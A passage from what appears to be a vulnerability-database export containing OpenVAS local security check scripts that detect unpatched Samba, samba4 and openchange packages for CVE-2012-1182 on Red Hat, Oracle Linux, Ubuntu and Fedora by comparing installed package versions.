included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, Samba4\n Package Support in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by wbinfo -n or\n wbinfo -s commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named samba4 to avoid conflicts during the\n upgrade.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2012-0465", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123940", "title": "Oracle Linux Local Check: ELSA-2012-0465", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0465.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123940\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:36 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0465\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0465 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0465\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0465.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:45", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2013-0506", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123695", "title": "Oracle Linux Local Check: ELSA-2013-0506", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0506.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123695\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:21 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0506\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0506 - samba4 security, bug fix and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0506\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0506.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1423-1", "modified": "2019-03-13T00:00:00", "published": "2012-04-13T00:00:00", "id": "OPENVAS:1361412562310840980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840980", "title": "Ubuntu Update for samba USN-1423-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840980\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. (CVE-2012-1182)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-17T00:00:00", "id": "OPENVAS:1361412562310864238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864238", "title": "Fedora Update for samba4 FEDORA-2012-6382", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6382\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864238\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-17 10:31:56 +0530 (Thu, 17 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6382\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"samba4 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~38.alpha16.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310870928", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870928", "title": "RedHat Update for openchange RHSA-2013:0515-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870928\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openchange'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n 